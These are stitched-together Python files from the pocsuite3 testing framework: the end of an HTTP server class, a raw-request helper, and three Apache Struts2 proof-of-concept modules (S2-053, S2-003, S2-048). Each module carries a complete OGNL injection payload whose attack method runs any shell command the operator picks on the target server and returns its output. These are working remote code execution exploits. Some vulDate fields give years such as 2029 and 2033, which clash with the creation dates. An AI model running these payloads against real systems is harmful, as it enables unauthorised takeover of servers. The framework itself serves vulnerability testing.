            while self.__running.is_set():
                time.sleep(1)
                self.__flag.wait()
                if not self.server_started:
                    self.httpd = self.httpserver((self.bind_ip, self.bind_port), self.requestHandler)
                    logger.info(f"Starting httpd on {self.url}")
                    if self.https:
                        if self.certfile:
                            self.httpd.socket = ssl.wrap_socket(self.httpd.socket, certfile=self.certfile,
                                                                server_side=True)
                        else:
                            logger.error("You must provide certfile to use https")
                            break
                    thread = threading.Thread(target=self.httpd.serve_forever)
                    thread.setDaemon(True)
                    thread.start()
                    self.server_started = True
                    self.__flag.clear()
            self.httpd.shutdown()
            self.httpd.server_close()
            logger.info(f'Stop httpd server on {self.url}')
        except Exception as ex:
            self.httpd.shutdown()
            self.httpd.server_close()
            logger.error(str(ex))

    def pause(self):
        self.__flag.clear()  # Set to False, let the thread block

    def resume(self):
        self.__flag.set()  # Set to True to stop the thread from blocking

    def stop(self):
        self.__flag.set()  # Restore the thread from the paused state, if it has been paused
        self.__running.clear()  # Set to False, stop threading

        time.sleep(random.randint(1, 3))



import requests
from requests.sessions import Session
import json

from requests.structures import CaseInsensitiveDict


def extract_dict(text, sep, sep2="="):
    """Split the string into a dictionary according to the split method

    :param text: Split text
    :param sep: The first character of the split, usually'\n'
    :param sep2: The second character of the split, the default is '='
    :return: Return a dict type, the key is the 0th position of sep2,
     and the value is the first position of sep2.
     Only the text can be converted into a dictionary,
     if the text is of other types, an error will occur
    """
    _dict = CaseInsensitiveDict([l.split(sep2, 1) for l in text.split(sep)])
    return _dict


def httpraw(raw: str, ssl: bool = False, **kwargs):
    """
    Send the original HTTP packet request, if you set the parameters such as headers in the parameters, the parameters
    you set will be sent

    :param raw: Original packet text
    :param ssl: whether is HTTPS
    :param kwargs: Support setting of parameters in requests
    :return:requests.Response
    """
    raw = raw.strip()
    # Clear up unnecessary spaces
    raws = list(map(lambda x: x.strip(), raw.splitlines()))
    try:
        method, path, protocol = raws[0].split(" ")
    except Exception:
        raise Exception("Protocol format error")
    post = None
    _json = None
    if method.upper() == "POST":
        index = 0
        for i in raws:
            index += 1
            if i.strip() == "":
                break
        if len(raws) == index:
            raise Exception
        tmp_headers = raws[1:index - 1]
        tmp_headers = extract_dict('\n'.join(tmp_headers), '\n', ": ")
        postData = '\n'.join(raws[index:])
        try:
            json.loads(postData)
            _json = postData
        except ValueError:
            post = postData
    else:
        tmp_headers = extract_dict('\n'.join(raws[1:]), '\n', ": ")
    netloc = "http" if not ssl else "https"
    host = tmp_headers.get("Host", None)
    if host is None:
        raise Exception("Host is None")
    del tmp_headers["Host"]
    url = "{0}://{1}".format(netloc, host + path)

    kwargs.setdefault('allow_redirects', True)
    kwargs.setdefault('data', post)
    kwargs.setdefault('headers', tmp_headers)
    kwargs.setdefault('json', _json)

    with Session() as session:
        return session.request(method=method, url=url, **kwargs)


def patch_addraw():
    requests.httpraw = httpraw



import random
from collections import OrderedDict
from urllib.parse import quote

from lxml import etree

from pocsuite3.api import Output, POCBase, POC_CATEGORY, register_poc, requests
from pocsuite3.lib.core.enums import VUL_TYPE
from pocsuite3.lib.core.interpreter_option import OptString


class DemoPOC(POCBase):
    vulID = ''  # ssvid
    version = '1.0'
    author = ['knownsec.com']
    vulDate = '2029-5-8'
    createDate = '2019-5-8'
    updateDate = '2019-5-8'
    references = ['https://cwiki.apache.org/confluence/display/WW/S2-053']
    name = 'Apache Struts2 s2-053'
    appPowerLink = ''
    appName = 'Apache Struts2'
    appVersion = 'Struts 2.0.0 - 2.3.33\nStruts 2.5 - Struts 2.5.10.1'
    vulType = VUL_TYPE.CODE_EXECUTION
    desc = '''S2-053:影响版本Struts 2.0.1-2.3.33,2.5-2.5.10.1; '''
    samples = []
    category = POC_CATEGORY.EXPLOITS.WEBAPP
    dockerfile = '''FROM isxiangyang/struts2-all-vul-pocsuite:latest'''

    def _options(self):
        o = OrderedDict()
        o['param'] = OptString('message', description='url参数')
        o['command'] = OptString('ls', description='执行的命令')
        return o

    def _verify(self):
        p = self._check()
        if p:
            return self.parse_output(p)

    def _check(self):
        result = {}
        headers = {
            "Content-Type": 'application/x-www-form-urlencoded'
        }
        data = "message={exp}"
        check_poc = "%25%7B{num1}%2B{num2}%7D"
        num1 = random.randint(10000, 100000)
        num2 = random.randint(10000, 100000)
        poc = check_poc.format(num1=num1, num2=num2)
        data = data.format(exp=poc)
        html = requests.post(self.url, data, headers=headers).text
        nn = str(num1 + num2)
        if nn in html:
            result["VerifyInfo"] = {
                "URL": self.url,
            }
            return result
        return False

    def _attack(self):
        result = {}
        p = self._check()
        if p:
            url = self.url.rstrip('/')
            command = self.get_option("command")
            payload = "%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='" + command + "').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}"
            headers = {"Content-Type": "application/x-www-form-urlencoded"}
            res = requests.post(url, data=f"{self.get_option('param')}=" + quote(payload) + "%0A", headers=headers)
            tree = etree.HTML(res.text)
            if res.status_code == 200:
                result_cmd = tree.xpath("//*[@type=\"hidden\"]/@id")
                result["VerifyInfo"] = {
                    "result": result_cmd,
                }
        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output


register_poc(DemoPOC)



from collections import OrderedDict
from urllib.parse import quote

from pocsuite3.api import Output, POCBase, POC_CATEGORY, register_poc, requests
from pocsuite3.lib.core.enums import VUL_TYPE
from pocsuite3.lib.core.interpreter_option import OptString


class DemoPOC(POCBase):
    vulID = ''  # ssvid
    version = '1.0'
    author = ['knownsec.com']
    vulDate = '2033-11-15'
    createDate = '2023-11-15'
    updateDate = '2023-11-15'
    references = ['https://cwiki.apache.org/confluence/display/WW/S2-003']
    name = 'Apache Struts2 s2-003'
    appPowerLink = ''
    appName = 'Apache Struts2'
    appVersion = 'Struts 2.0.0 - Struts 2.1.8.1'
    vulType = VUL_TYPE.CODE_EXECUTION
    desc = '''Struts 2.0.0 - Struts 2.1.8.1'''
    samples = []
    category = POC_CATEGORY.EXPLOITS.WEBAPP
    dockerfile = '''FROM isxiangyang/struts2-all-vul-pocsuite:latest'''

    def _options(self):
        o = OrderedDict()
        o["command"] = OptString('', description="可执行的shell命令")
        return o

    def _check(self):
        result = {}
        exec_payload = r"(%27\\u0023context[\%27xwork.MethodAccessor.denyMethodExecution\%27]\\u003dfalse%27)(bla)(bla)&(%27\\u0023_memberAccess.excludeProperties\\u003d@java.util.Collections@EMPTY_SET%27)(kxlzx)(kxlzx)&(%27\\u0023mycmd\\u003d\%27{cmd}\%27%27)(bla)(bla)&(%27\\u0023myret\\u003d@java.lang.Runtime@getRuntime().exec(\\u0023mycmd)%27)(bla)(bla)&(A)((%27\\u0023mydat\\u003dnew\\40java.io.DataInputStream(\\u0023myret.getInputStream())%27)(bla))&(B)((%27\\u0023myres\\u003dnew\\40byte[51020]%27)(bla))&(C)((%27\\u0023mydat.readFully(\\u0023myres)%27)(bla))&(D)((%27\\u0023mystr\\u003dnew\\40java.lang.String(\\u0023myres)%27)(bla))&(%27\\u0023myout\\u003d@org.apache.struts2.ServletActionContext@getResponse()%27)(bla)(bla)&(E)((%27\\u0023myout.getWriter().println(\\u0023mystr)%27)(bla))"  # noqa: E501
        paylaod = exec_payload.format(cmd=quote("id"))
        r = requests.get(self.url + "?" + paylaod)
        if "groups=" in r.text:
            result["VerifyInfo"] = {
                "URL": self.url,
                "result": r.text.replace("\x00", "").encode()
            }
            return result
        return False

    def _verify(self):
        p = self._check()
        if p:
            return self.parse_output(p)

    def _attack(self):
        p = self._check()
        result = {}
        if p:
            cmd = self.get_option("command")
            exec_payload = r"(%27\\u0023context[\%27xwork.MethodAccessor.denyMethodExecution\%27]\\u003dfalse%27)(bla)(bla)&(%27\\u0023_memberAccess.excludeProperties\\u003d@java.util.Collections@EMPTY_SET%27)(kxlzx)(kxlzx)&(%27\\u0023mycmd\\u003d\%27{cmd}\%27%27)(bla)(bla)&(%27\\u0023myret\\u003d@java.lang.Runtime@getRuntime().exec(\\u0023mycmd)%27)(bla)(bla)&(A)((%27\\u0023mydat\\u003dnew\\40java.io.DataInputStream(\\u0023myret.getInputStream())%27)(bla))&(B)((%27\\u0023myres\\u003dnew\\40byte[51020]%27)(bla))&(C)((%27\\u0023mydat.readFully(\\u0023myres)%27)(bla))&(D)((%27\\u0023mystr\\u003dnew\\40java.lang.String(\\u0023myres)%27)(bla))&(%27\\u0023myout\\u003d@org.apache.struts2.ServletActionContext@getResponse()%27)(bla)(bla)&(E)((%27\\u0023myout.getWriter().println(\\u0023mystr)%27)(bla))"  # noqa: E501
            payload = exec_payload.format(cmd=quote(cmd))
            r = requests.get(self.url + "?" + payload)
            if r.text:
                result["VerifyInfo"] = {
                    "URL": self.url,
                    "PAYLOAD": r.text.replace("\x00", "").encode()
                }
        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output


register_poc(DemoPOC)



import random
from collections import OrderedDict
from urllib.parse import quote

from pocsuite3.api import Output, POCBase, POC_CATEGORY, register_poc, requests
from pocsuite3.lib.core.enums import VUL_TYPE
from pocsuite3.lib.core.interpreter_option import OptString


class DemoPOC(POCBase):
    vulID = ''  # ssvid
    version = '1.0'
    author = ['knownsec.com']
    vulDate = '2029-5-8'
    createDate = '2019-5-8'
    updateDate = '2019-5-8'
    references = ['https://cwiki.apache.org/confluence/display/WW/S2-048']
    name = 'Apache Struts2 s2-048'
    appPowerLink = ''
    appName = 'Apache Struts2'
    appVersion = 'Struts 2.3.x with Struts 1 plugin and Struts 1 action'
    vulType = VUL_TYPE.CODE_EXECUTION
    desc = '''S2-048:影响版本Struts 2.3.x with Struts 1 plugin and Struts 1 action; '''
    samples = []
    category = POC_CATEGORY.EXPLOITS.WEBAPP
    dockerfile = '''FROM isxiangyang/struts2-all-vul-pocsuite:latest'''

    def _options(self):
        o = OrderedDict()
        o["command"] = OptString('ls', description="需要执行的命令")
        return o

    def _verify(self):
        p = self._check()
        if p:
            return self.parse_output(p)

    def _check(self):
        result = {}
        randint = random.randint(300, 900)
        calc_result = randint * randint
        cmd = f"echo {calc_result}"
        headers = {"Content-Type": "application/x-www-form-urlencoded"}
        post_data = self.get_exp(cmd)
        res = requests.post(self.url, headers=headers, data=post_data)
        if str(calc_result) in res.text:
            result["VerifyInfo"] = {
                "URL": self.url,
                "Status": "Success!"
            }
            return result
        return False

    def get_exp(self, cmd):
        cmd = quote(cmd)
        data2 = "name=%25%7B%28%23_%3D%27multipart%2fform-data%27%29.%28%23dm%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28@com.opensymphony.xwork2.ognl.OgnlUtil@class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27" + cmd + "%27%29.%28%23iswin%3D%28@java.lang.System@getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27%2fc%27%2C%23cmd%7D%3A%7B%27%2fbin%2fbash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%23ros%3D%28@org.apache.struts2.ServletActionContext@getResponse%28%29.getOutputStream%28%29%29%29.%28@org.apache.commons.io.IOUtils@copy%28%23process.getInputStream%28%29%2C%23ros%29%29.%28%23ros.flush%28%29%29%7D&age=123&__cheackbox_bustedBefore=true&description=123"
        return data2

    def _attack(self):
        result = {}
        p = self._check()
        if p:
            cmd = self.get_option("command")
            headers = {"Content-Type": "application/x-www-form-urlencoded"}
            post_data = self.get_exp(cmd)
            res = requests.post(self.url, headers=headers, data=post_data)
            if res.status_code == 200:
                result["VerifyInfo"] = {
                    "result": res.text.replace("\x00", "").encode()
                }
        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output


register_poc(DemoPOC)
